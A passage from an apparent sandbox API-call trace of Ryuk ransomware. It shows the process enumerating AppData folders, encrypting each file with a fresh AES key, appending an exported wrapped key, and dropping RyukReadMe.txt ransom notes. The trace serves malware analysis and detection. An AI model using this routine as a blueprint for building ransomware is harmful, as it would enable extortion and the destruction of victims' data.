pbData=0x29ab960, pdwDataLen=0x29ab8e0 | out: pbData=0x29ab960*, pdwDataLen=0x29ab8e0*=0x10c) returned 1 [0143.110] WriteFile (in: hFile=0x194, lpBuffer=0x29ab960*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ab8d4, lpOverlapped=0x0 | out: lpBuffer=0x29ab960*, lpNumberOfBytesWritten=0x29ab8d4*=0x10c, lpOverlapped=0x0) returned 1 [0143.110] CloseHandle (hObject=0x194) returned 1 [0143.126] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0143.130] CryptDestroyKey (hKey=0x3b8690) returned 1 [0143.130] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0143.130] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0143.130] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0143.130] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Visio\\thumbs.dat", dwFileAttributes=0x80) returned 1 [0143.131] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Visio\\thumbs.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\visio\\thumbs.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x194 [0143.131] GetFileSizeEx (in: hFile=0x194, lpFileSize=0x29ab8d8 | out: lpFileSize=0x29ab8d8*=128000) returned 1 [0143.131] GetFileSizeEx (in: hFile=0x194, lpFileSize=0x29ab8e8 | out: lpFileSize=0x29ab8e8*=128000) returned 1 [0143.131] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x1f2de, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0143.131] ReadFile (in: hFile=0x194, lpBuffer=0x29ab938, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ab8f8, lpOverlapped=0x0 | out: lpBuffer=0x29ab938*, lpNumberOfBytesRead=0x29ab8f8*=0x19, lpOverlapped=0x0) returned 1 [0143.132] SetFilePointer (in: hFile=0x194, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0143.132] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ab8c0 | out: phKey=0x29ab8c0*=0x3b8690) returned 1 [0143.132] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0143.132] SetFilePointer (in: hFile=0x194, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0143.132] ReadFile (in: hFile=0x194, lpBuffer=0x2760000, nNumberOfBytesToRead=0x1f400, lpNumberOfBytesRead=0x29ab8d0, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ab8d0*=0x1f400, lpOverlapped=0x0) returned 1 [0143.134] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ab8cc*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ab8cc*=0xf4250) returned 1 [0143.135] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ab8c8*=0x1f400, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ab8c8*=0x1f410) returned 1 [0143.135] SetFilePointer (in: hFile=0x194, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0143.135] WriteFile (in: hFile=0x194, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x1f410, lpNumberOfBytesWritten=0x29ab8d0, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ab8d0*=0x1f410, lpOverlapped=0x0) returned 1 [0143.136] WriteFile (in: hFile=0x194, lpBuffer=0x29ab910*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29ab8d4, lpOverlapped=0x0 | out: lpBuffer=0x29ab910*, lpNumberOfBytesWritten=0x29ab8d4*=0x6, lpOverlapped=0x0) returned 1 [0143.136] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ab8e0 | out: pbData=0x0*, pdwDataLen=0x29ab8e0*=0x10c) returned 1 [0143.136] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ab960, pdwDataLen=0x29ab8e0 | out: pbData=0x29ab960*, pdwDataLen=0x29ab8e0*=0x10c) returned 1 [0143.136] WriteFile (in: hFile=0x194, lpBuffer=0x29ab960*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ab8d4, lpOverlapped=0x0 | out: lpBuffer=0x29ab960*, lpNumberOfBytesWritten=0x29ab8d4*=0x10c, lpOverlapped=0x0) returned 1 [0143.136] CloseHandle (hObject=0x194) returned 1 [0143.151] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0143.155] CryptDestroyKey (hKey=0x3b8690) returned 1 [0143.155] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0143.155] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0 [0143.155] FindClose (in: hFindFile=0x3a2ee0 | out: hFindFile=0x3a2ee0) returned 1 [0143.155] SetLastError (dwErrCode=0x0) [0143.155] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Visio\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\visio\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x190 [0143.155] GetLastError () returned 0x0 [0143.155] WriteFile (in: hFile=0x190, lpBuffer=0x13f108500*, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpBuffer=0x13f108500*, lpNumberOfBytesWritten=0x29ac290*=0x320, lpOverlapped=0x0) returned 1 [0143.156] CloseHandle (hObject=0x190) returned 1 [0143.156] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0143.156] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0143.156] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0143.156] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0143.156] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0 [0143.156] FindClose (in: hFindFile=0x3a2e80 | out: hFindFile=0x3a2e80) returned 1 [0143.156] SetLastError (dwErrCode=0x0) [0143.156] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x18c [0143.157] GetLastError () returned 0xb7 [0143.157] CloseHandle (hObject=0x18c) returned 1 [0143.157] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0143.157] SetLastError (dwErrCode=0x0) [0143.157] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x18c [0143.157] GetLastError () returned 0xb7 [0143.157] CloseHandle (hObject=0x18c) returned 1 [0143.157] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft Help\\*.*", lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0x3a2e80 [0143.157] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0143.157] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0 [0143.157] FindClose (in: hFindFile=0x3a2e80 | out: hFindFile=0x3a2e80) returned 1 [0143.157] SetLastError (dwErrCode=0x0) [0143.157] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft Help\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft help\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x18c [0143.158] GetLastError () returned 0x0 [0143.158] WriteFile (in: hFile=0x18c, lpBuffer=0x13f108500*, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpBuffer=0x13f108500*, lpNumberOfBytesWritten=0x29aca40*=0x320, lpOverlapped=0x0) returned 1 [0143.158] CloseHandle (hObject=0x18c) returned 1 [0143.158] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0143.158] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0143.158] SetLastError (dwErrCode=0x0) [0143.158] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x18c [0143.159] GetLastError () returned 0xb7 [0143.159] CloseHandle (hObject=0x18c) returned 1 [0143.159] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\*.*", lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0x3a2e80 [0143.159] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0143.159] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0143.159] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0143.159] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\-MYx8VJgITD8 Z52C0.mp3", dwFileAttributes=0x80) returned 1 [0143.159] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\-MYx8VJgITD8 Z52C0.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\-myx8vjgitd8 z52c0.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x190 [0143.159] GetFileSizeEx (in: hFile=0x190, lpFileSize=0x29ac088 | out: lpFileSize=0x29ac088*=7253) returned 1 [0143.159] GetFileSizeEx (in: hFile=0x190, lpFileSize=0x29ac098 | out: lpFileSize=0x29ac098*=7253) returned 1 [0143.159] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x1b33, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0143.159] ReadFile (in: hFile=0x190, lpBuffer=0x29ac0e8, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ac0a8, lpOverlapped=0x0 | out: lpBuffer=0x29ac0e8*, lpNumberOfBytesRead=0x29ac0a8*=0x19, lpOverlapped=0x0) returned 1 [0143.160] SetFilePointer (in: hFile=0x190, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0143.160] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ac070 | out: phKey=0x29ac070*=0x3b8690) returned 1 [0143.160] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0143.161] SetFilePointer (in: hFile=0x190, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0143.161] ReadFile (in: hFile=0x190, lpBuffer=0x2760000, nNumberOfBytesToRead=0x1c55, lpNumberOfBytesRead=0x29ac080, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ac080*=0x1c55, lpOverlapped=0x0) returned 1 [0143.161] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ac07c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ac07c*=0xf4250) returned 1 [0143.161] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ac078*=0x1c55, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ac078*=0x1c60) returned 1 [0143.161] SetFilePointer (in: hFile=0x190, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0143.161] WriteFile (in: hFile=0x190, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x1c60, lpNumberOfBytesWritten=0x29ac080, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ac080*=0x1c60, lpOverlapped=0x0) returned 1 [0143.161] WriteFile (in: hFile=0x190, lpBuffer=0x29ac0c0*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29ac084, lpOverlapped=0x0 | out: lpBuffer=0x29ac0c0*, lpNumberOfBytesWritten=0x29ac084*=0x6, lpOverlapped=0x0) returned 1 [0143.161] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ac090 | out: pbData=0x0*, pdwDataLen=0x29ac090*=0x10c) returned 1 [0143.161] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ac110, pdwDataLen=0x29ac090 | out: pbData=0x29ac110*, pdwDataLen=0x29ac090*=0x10c) returned 1 [0143.161] WriteFile (in: hFile=0x190, lpBuffer=0x29ac110*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ac084, lpOverlapped=0x0 | out: lpBuffer=0x29ac110*, lpNumberOfBytesWritten=0x29ac084*=0x10c, lpOverlapped=0x0) returned 1 [0143.161] CloseHandle (hObject=0x190) returned 1 [0143.180] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0143.184] CryptDestroyKey (hKey=0x3b8690) returned 1 [0143.184] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0143.184] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0143.184] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0143.184] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\94zgXZid8qg4.doc", dwFileAttributes=0x80) returned 1 [0143.184] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\94zgXZid8qg4.doc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\94zgxzid8qg4.doc"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x190 [0143.184] GetFileSizeEx (in: hFile=0x190, lpFileSize=0x29ac088 | out: lpFileSize=0x29ac088*=16669) returned 1 [0143.185] GetFileSizeEx (in: hFile=0x190, lpFileSize=0x29ac098 | out: lpFileSize=0x29ac098*=16669) returned 1 [0143.185] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x3ffb, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0143.185] ReadFile (in: hFile=0x190, lpBuffer=0x29ac0e8, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ac0a8, lpOverlapped=0x0 | out: lpBuffer=0x29ac0e8*, lpNumberOfBytesRead=0x29ac0a8*=0x19, lpOverlapped=0x0) returned 1 [0143.185] SetFilePointer (in: hFile=0x190, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0143.185] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ac070 | out: phKey=0x29ac070*=0x3b8690) returned 1 [0143.185] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0143.185] SetFilePointer (in: hFile=0x190, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0143.185] ReadFile (in: hFile=0x190, lpBuffer=0x2760000, nNumberOfBytesToRead=0x411d, lpNumberOfBytesRead=0x29ac080, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ac080*=0x411d, lpOverlapped=0x0) returned 1 [0143.186] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ac07c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ac07c*=0xf4250) returned 1 [0143.186] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ac078*=0x411d, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ac078*=0x4120) returned 1 [0143.186] SetFilePointer (in: hFile=0x190, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0143.186] WriteFile (in: hFile=0x190, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x4120, lpNumberOfBytesWritten=0x29ac080, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ac080*=0x4120, lpOverlapped=0x0) returned 1 [0143.186] WriteFile (in: hFile=0x190, lpBuffer=0x29ac0c0*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29ac084, lpOverlapped=0x0 | out: lpBuffer=0x29ac0c0*, lpNumberOfBytesWritten=0x29ac084*=0x6, lpOverlapped=0x0) returned 1 [0143.186] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ac090 | out: pbData=0x0*, pdwDataLen=0x29ac090*=0x10c) returned 1 [0143.186] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ac110, pdwDataLen=0x29ac090 | out: pbData=0x29ac110*, pdwDataLen=0x29ac090*=0x10c) returned 1 [0143.186] WriteFile (in: hFile=0x190, lpBuffer=0x29ac110*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ac084, lpOverlapped=0x0 | out: lpBuffer=0x29ac110*, lpNumberOfBytesWritten=0x29ac084*=0x10c, lpOverlapped=0x0) returned 1 [0143.186] CloseHandle (hObject=0x190) returned 1 [0143.203] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0143.207] CryptDestroyKey (hKey=0x3b8690) returned 1 [0143.207] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0143.207] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0143.207] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0143.207] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\AdobeARM.log", dwFileAttributes=0x80) returned 1 [0143.208] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\AdobeARM.log" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\adobearm.log"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x190 [0143.208] GetFileSizeEx (in: hFile=0x190, lpFileSize=0x29ac088 | out: lpFileSize=0x29ac088*=707) returned 1 [0143.208] GetFileSizeEx (in: hFile=0x190, lpFileSize=0x29ac098 | out: lpFileSize=0x29ac098*=707) returned 1 [0143.208] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x1a1, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0143.208] ReadFile (in: hFile=0x190, lpBuffer=0x29ac0e8, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ac0a8, lpOverlapped=0x0 | out: lpBuffer=0x29ac0e8*, lpNumberOfBytesRead=0x29ac0a8*=0x19, lpOverlapped=0x0) returned 1 [0143.209] SetFilePointer (in: hFile=0x190, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0143.209] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ac070 | out: phKey=0x29ac070*=0x3b8690) returned 1 [0143.209] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0143.209] SetFilePointer (in: hFile=0x190, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0143.209] ReadFile (in: hFile=0x190, lpBuffer=0x2760000, nNumberOfBytesToRead=0x2c3, lpNumberOfBytesRead=0x29ac080, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ac080*=0x2c3, lpOverlapped=0x0) returned 1 [0143.209] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ac07c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ac07c*=0xf4250) returned 1 [0143.209] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ac078*=0x2c3, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ac078*=0x2d0) returned 1 [0143.209] SetFilePointer (in: hFile=0x190, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0143.209] WriteFile (in: hFile=0x190, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x2d0, lpNumberOfBytesWritten=0x29ac080, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ac080*=0x2d0, lpOverlapped=0x0) returned 1 [0143.209] WriteFile (in: hFile=0x190, lpBuffer=0x29ac0c0*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29ac084, lpOverlapped=0x0 | out: lpBuffer=0x29ac0c0*, lpNumberOfBytesWritten=0x29ac084*=0x6, lpOverlapped=0x0) returned 1 [0143.209] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ac090 | out: pbData=0x0*, pdwDataLen=0x29ac090*=0x10c) returned 1 [0143.209] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ac110, pdwDataLen=0x29ac090 | out: pbData=0x29ac110*, pdwDataLen=0x29ac090*=0x10c) returned 1 [0143.209] WriteFile (in: hFile=0x190, lpBuffer=0x29ac110*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ac084, lpOverlapped=0x0 | out: lpBuffer=0x29ac110*, lpNumberOfBytesWritten=0x29ac084*=0x10c, lpOverlapped=0x0) returned 1 [0143.209] CloseHandle (hObject=0x190) returned 1 [0143.243] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0143.247] CryptDestroyKey (hKey=0x3b8690) returned 1 [0143.247] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0143.247] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0143.247] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0143.248] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\c0xKWXAnNWTFB3.swf", dwFileAttributes=0x80) returned 1 [0143.248] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Temp\\c0xKWXAnNWTFB3.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\temp\\c0xkwxannwtfb3.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x190 [0143.248] GetFileSizeEx (in: hFile=0x190, lpFileSize=0x29ac088 | out: lpFileSize=0x29ac088*=33885) returned 1 [0143.248] GetFileSizeEx (in: hFile=0x190, lpFileSize=0x29ac098 | out: lpFileSize=0x29ac098*=33885) returned 1 [0143.248] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x833b, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0143.248] ReadFile (in: hFile=0x190, lpBuffer=0x29ac0e8, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ac0a8, lpOverlapped=0x0 | out: lpBuffer=0x29ac0e8*, lpNumberOfBytesRead=0x29ac0a8*=0x19, lpOverlapped=0x0) returned 1 [0143.249] SetFilePointer (in: hFile=0x190, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0143.249] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ac070 | out: phKey=0x29ac070*=0x3b8690) returned 1 [0143.249] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0143.249] SetFilePointer (in: hFile=0x190, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0143.249] ReadFile (in: hFile=0x190, lpBuffer=0x2760000, nNumberOfBytesToRead=0x845d, lpNumberOfBytesRead=0x29ac080, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ac080*=0x845d, lpOverlapped=0x0) returned 1 [0143.250] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ac07c*=0xf4240, 